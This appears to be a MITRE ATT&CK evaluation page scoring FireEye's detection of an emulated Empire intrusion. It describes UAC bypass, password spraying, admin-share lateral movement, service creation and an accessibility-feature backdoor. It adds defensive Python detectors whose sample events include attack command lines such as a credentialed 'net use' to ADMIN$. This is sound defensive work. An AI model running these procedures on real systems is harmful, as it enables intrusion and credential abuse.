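The enrichments in steps 12.G.1 through 13.C.1 all follow one pattern: a process-creation event for a built-in Windows binary is matched on its command line and tagged with an ATT&CK technique and tactic. The block below is an added example, not FireEye code, that does the same over constructed Sysmon-style events. It uses the technique IDs this page uses, mirrors the page's alert names, and generalises "net use" to the admin-share mount and unmount forms seen later in steps 16.B.1 and 16.C.1, plus the generic "net group" tagging (T1069) from the earlier caption above. The rule table, the helper names and the sample events are this example's own; the password masking imitates the redaction the capability applied.

```python
"""Command-line enrichment for the discovery and net-use LOLBins on this page.

Added example, not FireEye code. Tags constructed Sysmon-style process events
with the ATT&CK technique and tactic the page attaches to net.exe, netstat.exe
and reg.exe. Technique IDs are the ones this page uses.
"""
import re

# (image, regex over the arguments, alert name, technique, tactic).
# First match wins, so the more specific "net use" and "net group" forms come first.
RULES = [
    ("net.exe", r"^use\b.*\s/delete\b", "Net Use Command Execution",
     "T1126 - Network Share Connection Removal", "Defense Evasion"),
    ("net.exe", r"^use\s+\\\\\S+", "Net Use Command Execution",
     "T1077 - Windows Admin Shares", "Lateral Movement"),
    ("net.exe", r"^use\b", "Net Use Command Execution",
     "T1049 - System Network Connections Discovery", "Discovery"),
    ("net.exe", r'^group\s+"?domain computers"?', "Net Group Command Execution",
     "T1018 - Remote System Discovery", "Discovery"),
    ("net.exe", r"^(group|localgroup)\b", "Net Group Command Execution",
     "T1069 - Permission Groups Discovery", "Discovery"),
    ("net.exe", r"^user\b", "Net User Command Execution",
     "T1087 - Account Discovery", "Discovery"),
    ("netstat.exe", r"", "Netstat Execution",
     "T1049 - System Network Connections Discovery", "Discovery"),
    ("reg.exe", r"^query\b", "Reg Execution",
     "T1012 - Query Registry", "Discovery"),
]

# First token is the image (quoted or bare), the rest are its arguments.
_IMAGE_RE = re.compile(r'^\s*("[^"]*"|\S+)\s*(.*)$', re.S)


def split_cmdline(cmdline):
    """Return (image basename, remaining arguments) for a Windows command line."""
    m = _IMAGE_RE.match(cmdline)
    image, args = m.group(1).strip('"'), m.group(2).strip()
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if not name.endswith(".exe"):
        name += ".exe"                 # typed as "net user", without the extension
    if name == "net1.exe":             # net.exe hands most subcommands to net1.exe
        name = "net.exe"
    return name, args


def redact_password(args):
    """Mask the token that follows /user:<name>, as the capability did in 16.A.1."""
    return re.sub(r"(/user:\S+\s+)(?!/)\S+", r"\1<redacted>", args, flags=re.I)


def enrich(event):
    """Return an enrichment record for a matching event, or None."""
    name, args = split_cmdline(event["CommandLine"])
    for image, pattern, alert, technique, tactic in RULES:
        if name == image and re.search(pattern, args, re.I):
            return {
                "process_guid": event["ProcessGuid"],
                "parent": event.get("ParentImage", ""),
                "image": name,
                "args": redact_password(args),
                "alert": f"{alert} (Weak Signal)",
                "technique": technique,
                "tactic": tactic,
            }
    return None


def enrich_all(events):
    return [enrich(e) for e in events]


# Constructed process-creation events; not taken from the evaluation.
SAMPLE_EVENTS = [
    {"ProcessGuid": "1", "ParentImage": "powershell.exe", "CommandLine": r'"C:\Windows\system32\net.exe" user'},
    {"ProcessGuid": "2", "ParentImage": "powershell.exe", "CommandLine": "net user /domain"},
    {"ProcessGuid": "3", "ParentImage": "powershell.exe", "CommandLine": 'net group "Domain Computers" /domain'},
    {"ProcessGuid": "4", "ParentImage": "powershell.exe", "CommandLine": "net use"},
    {"ProcessGuid": "5", "ParentImage": "powershell.exe", "CommandLine": "netstat -ano"},
    {"ProcessGuid": "6", "ParentImage": "powershell.exe",
     "CommandLine": r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections'},
    {"ProcessGuid": "7", "ParentImage": "net.exe",
     "CommandLine": r"C:\Windows\system32\net1 use \\10.0.0.5\ADMIN$ /user:kmitnick Hunter2!"},
    {"ProcessGuid": "8", "ParentImage": "powershell.exe", "CommandLine": r"net use \\10.0.0.5\ADMIN$ /delete"},
    {"ProcessGuid": "9", "ParentImage": "explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for record in enrich_all(SAMPLE_EVENTS):
        print(record)
```

Event 7 shows why the rule keys on net1.exe as well as net.exe, and why the mount form is tagged Lateral Movement while a bare "net use" stays Discovery; event 9 falls through with no enrichment.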
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry (Configuration Change)
  
 
Telemetry showed powershell.exe executing as a high integrity process as SYSTEM, with a token logon ID previously associated with user Bob, which indicates UAC was bypassed. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called).
Telemetry showing execution of powershell.exe running as SYSTEM with token login ID 0x10530b3
Telemetry showing group membership of token logon ID 0x10530b3 associated with user Bob, which includes S-1-16-12288 (High Mandatory Level)
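The telemetry above is an analyst's join: a process event carries an integrity level and a logon ID, and the 4627 Group Membership event for that logon ID names the account and carries the mandatory-label SID (S-1-16-12288 for High). The block below is an added example, not FireEye code, that performs that join over constructed Sysmon process events and constructed 4627 records. The S-1-16-* label SIDs are the documented values; the parent/child integrity check is a triage heuristic of this example (consented elevation is brokered by the AppInfo service in svchost.exe, so a same-user child running at a higher integrity level than a non-svchost parent deserves a look), and the event records and helper names are constructed.

```python
"""Integrity-level correlation for the UAC bypass telemetry in step 14.A.1.

Added example, not FireEye code. Joins constructed Sysmon process events with
constructed Security event 4627 (Group Membership) records by logon ID.
"""
RANK = {"Low": 1, "Medium": 2, "High": 3, "System": 4}
LABEL_SIDS = {                       # documented mandatory-label SIDs
    "S-1-16-4096": "Low", "S-1-16-8192": "Medium",
    "S-1-16-12288": "High", "S-1-16-16384": "System",
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def session_label(group_event):
    """Mandatory label carried in a 4627 GroupMembership list, if any."""
    for sid in group_event["GroupMembership"].split():
        if sid in LABEL_SIDS:
            return LABEL_SIDS[sid]
    return None


def resolve_session(logon_id, group_events):
    """Account and integrity label for a logon ID, taken from 4627 events."""
    for g in group_events:
        if g["TargetLogonId"].lower() == logon_id.lower():
            return f'{g["TargetDomainName"]}\\{g["TargetUserName"]}', session_label(g)
    return None, None


def find_unbrokered_elevation(proc_events, group_events):
    """Same-user children that run above their parent's integrity level,
    where the parent is not the AppInfo service host (svchost.exe)."""
    by_guid = {e["ProcessGuid"]: e for e in proc_events}
    hits = []
    for child in proc_events:
        parent = by_guid.get(child["ParentProcessGuid"])
        if parent is None or basename(parent["Image"]) == "svchost.exe":
            continue            # no parent on record, or consent-brokered elevation
        if RANK.get(child["IntegrityLevel"], 0) <= RANK.get(parent["IntegrityLevel"], 0):
            continue            # no elevation across this parent/child edge
        if child["User"].lower() != parent["User"].lower():
            continue            # explicit credentials (runas) are a different pattern
        account, label = resolve_session(child["LogonId"], group_events)
        hits.append({
            "process_guid": child["ProcessGuid"],
            "image": basename(child["Image"]),
            "parent_image": basename(parent["Image"]),
            "integrity": f'{parent["IntegrityLevel"]} -> {child["IntegrityLevel"]}',
            "logon_id": child["LogonId"],
            "account_from_4627": account,
            "label_from_4627": label,
        })
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROCESS_EVENTS = [   # constructed Sysmon Event ID 1 records
    {"ProcessGuid": "P0", "ParentProcessGuid": "", "Image": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium", "LogonId": "0x10530b3", "User": r"DOMAIN\Bob"},
    {"ProcessGuid": "P1", "ParentProcessGuid": "P0", "Image": PS,
     "IntegrityLevel": "Medium", "LogonId": "0x10530b3", "User": r"DOMAIN\Bob"},
    {"ProcessGuid": "P2", "ParentProcessGuid": "P1", "Image": PS,
     "IntegrityLevel": "High", "LogonId": "0x10530f9", "User": r"DOMAIN\Bob"},
    {"ProcessGuid": "P9", "ParentProcessGuid": "", "Image": r"C:\Windows\System32\svchost.exe",
     "IntegrityLevel": "System", "LogonId": "0x3e7", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessGuid": "P3", "ParentProcessGuid": "P9", "Image": r"C:\Windows\System32\mmc.exe",
     "IntegrityLevel": "High", "LogonId": "0x10530f9", "User": r"DOMAIN\Bob"},
]
GROUP_EVENTS = [     # constructed Security Event ID 4627 records
    {"TargetUserName": "Bob", "TargetDomainName": "DOMAIN", "TargetLogonId": "0x10530b3",
     "GroupMembership": "S-1-5-21-1-2-3-513 S-1-1-0 S-1-5-32-545 S-1-16-8192"},
    {"TargetUserName": "Bob", "TargetDomainName": "DOMAIN", "TargetLogonId": "0x10530f9",
     "GroupMembership": "S-1-5-21-1-2-3-513 S-1-1-0 S-1-5-32-544 S-1-16-12288"},
]

if __name__ == "__main__":
    for hit in find_unbrokered_elevation(PROCESS_EVENTS, GROUP_EVENTS):
        print(hit)
```

P2 is reported (Medium powershell spawning High powershell for the same account, with the elevated logon session resolved to Bob and its High label through 4627); P3 is not, because its parent is the service host that legitimate elevation goes through. Without 4627 being collected, the account behind 0x10530f9 would be unknown, which is why the configuration change above mattered.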
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed a connection to freegoogleadsenseinfo.com (C2 domain) over TCP port 8080. The telemetry was tainted by the parent PowerShell URL Request (Weak Signal) alert.
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire instance communicated with freegoogleadsenseinfo.com (C2 domain) over port 8080. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing TCP port 8080 connection to freegoogleadsenseinfo.com (C2 domain) (tainted by parent PowerShell URL Request alert)
Excerpt from the Managed Defense Report indicating Empire communicated over port 8080 (General Behavior)
Additional excerpt from the Managed Defense Report indicating Empire was configured to communicate over port 8080 (General Behavior)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched an HTTP GET request for wdbypass with an alert for PowerShell URL Request (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Command and Control).
Enrichment of HTTP GET request for wdbypass with PowerShell URL Request alert (tagged with correct ATT&CK Technique, T1105 - Remote File Copy, and Tactic, Command and Control)
Standard Application Layer Protocol
(T1071)
Enrichment
  
The capability enriched a HTTP GET request with an alert for PowerShell URL Request (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control).
Enrichment of HTTP GET request with PowerShell URL Request alert (tagged with correct ATT&CK Technique, T1071 - Standard Application Layer Protocol, and Tactic, Command and Control)
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
Input Capture
(T1056)
None
  
No detection capability demonstrated for this procedure, though the capability detected PowerShell activity during the time of the keylogging.
PowerShell activity during the time of the keylogging (does not count as detection)
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
None
  
No detection capability demonstrated for this procedure.
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Enrichment
  
The capability enriched repeated logon attempts via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). The four events were included under the same alert, and each of the passwords was redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquisition data.
Telemetry (Configuration Change)
  
 
Telemetry showed the failed logon for Kmitnick, found by searching for Windows Security Event ID 4625 (An account failed to log on). A Configuration Change was made to allow for the capture of Event ID 4625.
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified that the attacker attempted to access systems using four accounts. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Frieda; tagged with related ATT&CK Technique, T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Bob; tagged with related ATT&CK Technique, T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Kmitnick; tagged with related ATT&CK Technique, T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Kmitnick; tagged with related ATT&CK Technique, T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Telemetry showing failed logon attempt for Kmitnick
Excerpt from the Managed Defense Report indicating the attacker attempted to access systems using four accounts (General Behavior)
Windows Admin Shares
(T1077)
Enrichment
  
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). The four events were included under the same alert.
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Frieda
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Bob
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Kmitnick
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Kmitnick
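Step 16.A.1 was found in telemetry by searching Event ID 4625 once that event was being collected. The block below is an added example, not FireEye code, that turns the search into a rule: a password spray tries one or two passwords against many accounts from a single source so that no account reaches its lockout threshold, so the rule looks for many distinct target accounts with few attempts each from one source address inside a short window. The 4625 records are constructed; the field names (TargetUserName, IpAddress, SubStatus) are the event's own and the SubStatus codes are the documented NTSTATUS values. Window and thresholds are this example's assumptions.

```python
"""Password-spray detection over Security event 4625 for step 16.A.1.

Added example, not FireEye code. Groups bad-password failures by source
address and flags a window with many accounts and few attempts per account.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# 0xC000006A bad password, 0xC0000064 no such user: both appear during sprays.
SPRAY_SUBSTATUS = {"0xc000006a", "0xc0000064"}

# Constructed 4625 records: (TimeCreated, Computer, TargetUserName, IpAddress, SubStatus).
# 4625 is logged on the target host; IpAddress is the source of the attempt.
FAILED_LOGONS = [
    ("2020-01-01T14:02:01", "MORRIS", "kmitnick", "10.0.1.5", "0xC000006A"),
    ("2020-01-01T14:02:02", "MORRIS", "Bob",      "10.0.1.5", "0xC000006A"),
    ("2020-01-01T14:02:03", "MORRIS", "Frieda",   "10.0.1.5", "0xC000006A"),
    ("2020-01-01T14:02:05", "NIMDA",  "kmitnick", "10.0.1.5", "0xC000006A"),
    ("2020-01-01T14:02:06", "NIMDA",  "Bob",      "10.0.1.5", "0xC000006A"),
    ("2020-01-01T14:02:07", "NIMDA",  "Frieda",   "10.0.1.5", "0xC000006A"),
    # one user mistyping their own password twice is not a spray
    ("2020-01-01T09:15:00", "MORRIS", "Debbie",   "10.0.1.6", "0xC000006A"),
    ("2020-01-01T09:15:30", "MORRIS", "Debbie",   "10.0.1.6", "0xC000006A"),
    # an expired account failing has a different SubStatus and is ignored
    ("2020-01-01T14:02:04", "MORRIS", "svc_old",  "10.0.1.5", "0xC0000193"),
]


def detect_password_spray(events, window=timedelta(minutes=10),
                          min_accounts=3, max_per_account=2):
    """One alert per source address whose best window meets the thresholds."""
    by_source = defaultdict(list)
    for ts, host, user, ip, sub in events:
        if sub.lower() in SPRAY_SUBSTATUS:
            by_source[ip].append((datetime.fromisoformat(ts), host, user.lower()))

    alerts = []
    for ip, rows in by_source.items():
        rows.sort()
        best, start = None, 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:   # slide the window
                start += 1
            win = rows[start:end + 1]
            per_account = Counter(u for _, _, u in win)
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                key = (len(per_account), len(win))        # prefer the widest qualifying window
                if best is None or key > best[0]:
                    best = (key, win, per_account)
        if best:
            _, win, per_account = best
            alerts.append({
                "source": ip,
                "accounts": sorted(per_account),
                "targets": sorted({h for _, h, _ in win}),
                "attempts": len(win),
                "first": win[0][0].isoformat(),
                "last": win[-1][0].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(FAILED_LOGONS):
        print(alert)
```

The source 10.0.1.5 is reported with three accounts across two target hosts; Debbie's repeated failures from 10.0.1.6 are not, because a single account does not satisfy the distinct-account threshold. Raising max_per_account lets the rule tolerate sprays that cycle through several passwords, at the cost of also matching slow brute force against a few accounts.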
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Enrichment
  
The capability enriched a logon attempt via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert details showed net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick. The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker accessed Conficker by mounting the ADMIN$ share. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe logon attempt to ADMIN$ with Net Use Command Execution alert (tagged with the correct ATT&CK Technique, T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Excerpt from the Managed Defense Report indicating the attacker accessed Conficker by mounting the ADMIN$ share (Specific Behavior)
Valid Accounts
(T1078)
Enrichment
  
The capability enriched a logon attempt via net.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for Kmitnick was redacted within the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquisition data.
Telemetry
  
Telemetry showed the successful logon for the user Kmitnick. 
Enrichment of net.exe logon attempt by Kmitnick with Net Use Command Execution alert
Telemetry showing successful logon of user Kmitnick
Brute Force
(T1110)
Enrichment
  
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement).
Telemetry
  
Telemetry showed the successful logon for the user Kmitnick.
Enrichment of net.exe with Net Use Command Execution alert (tagged with related ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Telemetry showing successful logon of user Kmitnick
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry
  
Telemetry showed net.exe executing with command-line arguments.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker unmounted the share from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing net.exe executing with command-line arguments
Excerpt from the Managed Defense Report indicating the attacker unmounted the share from CodeRed (Specific Behavior)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Enrichment
  
The capability enriched net1.exe with an alert for Net Use Command Execution (Weak Signal). The alert also was tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net1.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique, T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Excerpt from the Managed Defense Report indicating the attacker mounting the C$ on creeper with the kmitnick account (Specific Behavior)
Valid Accounts
(T1078)
Enrichment
  
The capability enriched a logon attempt via net1.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for the user Kmitnick was redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquisition data.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net1.exe logon attempt by Kmitnick with Net Use Command Execution alert
Excerpt from the Managed Defense Report indicating the attacker mounting the C$ on creeper with the kmitnick account (Specific Behavior)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched powershell.exe writing autoupdate.vbs with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement).
Enrichment of powershell.exe writing autoupdate.vbs with PowerShell File Write alert (tagged with correct ATT&CK Technique, T1105 - Remote File Copy, and Tactics, Command and Control and Lateral Movement)
Additional details on enrichment of powershell.exe writing autoupdate.vbs with PowerShell File Write alert
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Enrichment
  
The capability enriched cmd.exe spawning wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution). Alert details showed that the context of the user was changed to Kmitnick.
Telemetry
  
Telemetry showed cmd.exe executing autoupdate.vbs with a parent process of powershell.exe.
Enrichment of cmd.exe spawning wscript.exe with Wscript Execution alert (tagged with correct ATT&CK Technique, T1059 - Command-Line Interface, and Tactic, Execution)
Telemetry showing cmd.exe executing autoupdate.vbs
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched powershell.exe writing update.vbs with an alert for File Write to Network Share (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the autoupdate.vbs script being written to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of powershell.exe writing update.vbs with File Write to Network Share alert
Excerpt from the Managed Defense Report of the write of the autoupdate.vbs script (Specific Behavior)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with the correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details on enrichment of sc.exe with SC Execution alert
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command creating a new service called adobeupdater on Creeper from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with correct ATT&CK Technique, T1050 - New Service, and Tactic, Persistence)
Additional details on enrichment of sc.exe with SC Execution alert
Excerpt from the Managed Defense Report indicating sc.exe was used to create a new service (Specific Behavior)
Masquerading
(T1036)
Enrichment
  
The capability enriched the sc.exe command with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with related ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details on enrichment of sc.exe with SC Execution alert
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with the correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details on enrichment of sc.exe with SC Execution alert
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command starting the adobeupdater service on Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (tagged with related ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report showing sc.exe starting the adobeupdater service (Specific Behavior)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The telemetry was tainted by the parent Reg Execution (Weak Signal) alert.
Telemetry showing reg.exe executing with command-line arguments (tainted by parent Reg Execution alert)
Query Registry
(T1012)
Enrichment
  
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery).
Enrichment of reg.exe with Reg Execution alert (tagged with correct ATT&CK Technique, T1012 - Query Registry, and Tactic, Discovery)
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Enrichment
  
The capability enriched takeown.exe with an alert for Takeown Execution. The alert described how takeown can be used to change file ownership.
Enrichment of takeown.exe with Takeown Execution alert
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Enrichment
  
The capability enriched icacls.exe with an alert for Icacls Execution. The alert described how icacls can be used to display or change Windows file ACLs.
Enrichment of icacls.exe with Icacls Execution alert
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Specific Behavior
  
A Specific Behavior alert was generated for Suspicious Accessibility Features Replacement (BACKDOOR) based on magnify.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence).
Specific Behavior
  
A Specific Behavior alert was also generated for Accessibility Features File Write (Weak Signal) based on magnify.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified magnify.exe being overwritten with cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Specific Behavior alert on overwrite of magnify.exe for Suspicious Accessibility Features Replacement (BACKDOOR) (tagged with correct ATT&CK Technique, T1015 - Accessibility Features, and Tactic, Persistence)
Specific Behavior alert on overwrite of the magnify.exe for Accessibility Feature File Write (tagged with correct ATT&CK Technique, T1015 - Accessibility Features, and Tactic, Persistence)
Excerpt from the Managed Defense Report indicating the attacker overwrote magnify.exe (Specific Behavior)
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry (Tainted)
  
 
Telemetry showed the creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by the parent PowerShell File Write alert.
Specific Behavior
  
A Specific Behavior alert was generated on the file write of the .vsdx named File Write To Root Of Recycle Bin (Weak Signal). The alert details explained how all legitimate files should be written to a subfolder of the recycle bin, and not to the root.
Telemetry showing powershell.exe file write of .vsdx to the Recycle Bin with PowerShell File Write alert
Additional telemetry showing file write of .vsdx with PowerShell File Write alert
Specific Behavior alert for File Write to Root of Recycle Bin
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure.
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed the MD5 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by the parent PowerShell File Write alert.
